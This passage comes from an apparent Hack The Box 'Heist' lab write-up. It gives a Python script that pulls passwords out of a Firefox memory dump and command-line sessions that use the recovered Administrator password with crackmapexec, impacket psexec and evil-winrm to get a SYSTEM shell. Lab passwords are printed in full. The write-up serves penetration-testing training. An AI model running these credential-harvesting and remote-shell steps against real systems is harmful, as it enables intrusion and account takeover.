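            params = dict(parse_qsl(parts.query, keep_blank_values=True))
            secrets = {k: v for k, v in params.items() if SECRET_KEY.search(k) and v}
            if not secrets:
                continue  # a query string without anything secret-looking
            identity = {k: v for k, v in params.items()
                        if k not in secrets and IDENTITY_KEY.search(k) and v}
            endpoint = parts.netloc + parts.path
            key = (endpoint, tuple(sorted(identity.items())), tuple(sorted(secrets.items())))
            rec = hits.setdefault(key, {"endpoint": endpoint, "identity": identity,
                                        "secrets": secrets, "encodings": set(),
                                        "occurrences": 0})
            rec["encodings"].add(encoding)
            rec["occurrences"] += 1
    return sorted(hits.values(), key=lambda r: -r["occurrences"])


# Constructed stand-in for the Firefox dump: the login URL as found on the
# page, once as an ASCII environment entry and twice as UTF-16LE (command line
# and navigation URL), padded with junk, plus a harmless URL that must be ignored.
LOGIN_URL = ("localhost/login.php?login_username=admin@support.htb"
             "&login_password=4dD!5}x/re8]FBuZ&login=")
SAMPLE_DUMP = b"".join([
    b"\x00" * 16,
    b"MOZ_CRASHREPORTER_RESTART_ARG_1=" + LOGIN_URL.encode("ascii") + b"\x00",
    b"\x90\x90\x00\x01",
    ('"C:\\Program Files\\Mozilla Firefox\\firefox.exe" ' + LOGIN_URL).encode("utf-16-le") + b"\x00\x00",
    b"\x00" * 8,
    ("http://" + LOGIN_URL).encode("utf-16-le") + b"\x00\x00",
    b"https://example.test/search?q=procdump&page=2\x00",
])

if __name__ == "__main__":
    for rec in find_credentials(SAMPLE_DUMP):
        print(f"{rec['endpoint']}  identity={rec['identity']}  secrets={rec['secrets']}  "
              f"seen {rec['occurrences']}x as {sorted(rec['encodings'])}")
```

The UTF-16LE pass is the practical caveat: Windows stores process command lines and most UI strings as UTF-16, so a plain strings | grep over a dump can miss a credential that is present several times. Run it over the real dump with find_credentials(open("firefox.exe_200306_014405.dmp", "rb").read()).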

Check credentials

Crackmapexec confirms that these are the Administrator credentials.

u505@kali:~/HTB/Machines/Heist$ crackmapexec smb 10.10.10.149/32 -u Administrator -p '4dD!5}x/re8]FBuZ'
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [+] SUPPORTDESK\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)

And Administrator can use WinRM as well.

u505@kali:~/HTB/Machines/Heist$ crackmapexec winrm 10.10.10.149/32 -u Administrator -p '4dD!5}x/re8]FBuZ'
WINRM       10.10.10.149    5985   NONE             [*] http://10.10.10.149:5985/wsman
WARNING:urllib3.connectionpool:Failed to parse headers (url=http://10.10.10.149:5985/wsman): [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: ''
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
    assert_header_parsing(httplib_response.msg)
  File "/usr/lib/python3/dist-packages/urllib3/util/response.py", line 71, in assert_header_parsing
    raise HeaderParsingError(defects=defects, unparsed_data=unparsed_data)
urllib3.exceptions.HeaderParsingError: [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: ''
WINRM       10.10.10.149    5985   NONE             [+] None\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)

Root Flag

psexec

psexec.py from impacket gives a SYSTEM shell: it uploads a service binary to the writable ADMIN$ share, registers and starts it as a service, and removes both on exit. Effective, but noisy on the target (a new service and a new executable).

u505@kali:~/HTB/Machines/Heist$ python /opt/utils/impacket/examples/psexec.py administrator@heist.htb
Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on heist.htb.....
[*] Found writable share ADMIN$
[*] Uploading file IAsjWNER.exe
[*] Opening SVCManager on heist.htb.....
[*] Creating service CLOC on heist.htb.....
[*] Starting service CLOC.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\System32>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
<ROOT_FLAG>

C:\Users\Administrator\Desktop>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on heist.htb.....
[*] Stopping service CLOC.....
[*] Removing service CLOC.....
[*] Removing file IAsjWNER.exe.....

Evil-WinRM

Or, as before, we can get a PowerShell session with Evil-WinRM, which leaves no service behind.

u505@kali:~/HTB/Machines/Heist$ evil-winrm -i 10.10.10.149 -u Administrator -p '4dD!5}x/re8]FBuZ'

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
<ROOT_FLAG>

As a bonus, Administrator's Documents folder holds the PowerShell script behind the Firefox processes: it starts Firefox as chase with the admin credentials embedded in the URL on the command line, which is exactly why they were recoverable from the process memory dump.

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir


Directory: C:\Users\Administrator\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   8:24 AM            343 chase.ps1

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat chase.ps1
$u = 'supportdesk\chase'
$p = convertto-securestring 'Q4)sJu\Y8qz*A3?d' -asplain -force
$c = new-object system.management.automation.pscredential($u, $p)
start-process 'C:\Program Files\Mozilla Firefox\firefox.exe' -Credential $c -ArgumentList 'localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login='
*Evil-WinRM* PS C:\Users\Administrator\Documents> exit
Info: Exiting with code 0


Daniel Simao 08:25, 6 March 2020 (EST)